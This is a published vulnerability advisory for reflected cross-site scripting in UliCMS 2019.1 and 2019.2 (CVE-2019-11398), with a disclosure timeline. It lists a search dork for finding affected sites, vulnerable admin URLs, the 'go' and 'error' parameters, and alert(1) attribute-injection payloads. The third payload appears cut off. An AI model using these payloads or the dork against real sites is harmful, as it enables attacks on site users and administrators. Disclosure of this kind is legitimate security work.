UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting

2019-04-22 17:05:03

# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://en.ulicms.de/
# Version: 2019.2 , 2019.1
# CVE : CVE-2019-11398

### Vulnerability 1

Url : http://localhost/ulicms/ulicms/admin/index.php?go=test' accesskey='X' onclick='alert(1)
Vulnerable File : /ulicms/admin/inc/loginform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload: test' accesskey='X' onclick='alert(1)

Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>

### Vulnerability 2

Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test' accesskey='X' onclick='alert(1)
Vulnerable File : /ulicms/admin/inc/registerform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload : register=register&go=asd' accesskey='X' onclick='alert(1)

Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>

### Vulnerability 3 - Authenticated

Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=
Request Type: GET
Vulnerable Parameter : "error"
Payload : action=favicon&error=

### History
=============
2019-04-13 Issue discovered
2019-04-13 Vendor contacted
2019-04-13 Vendor response and hotfix
2019-04-14 Vendor releases fixed versions
2019-04-22 Advisory release

Fixes

No fixes

In order to submit a new fix you need to be registered.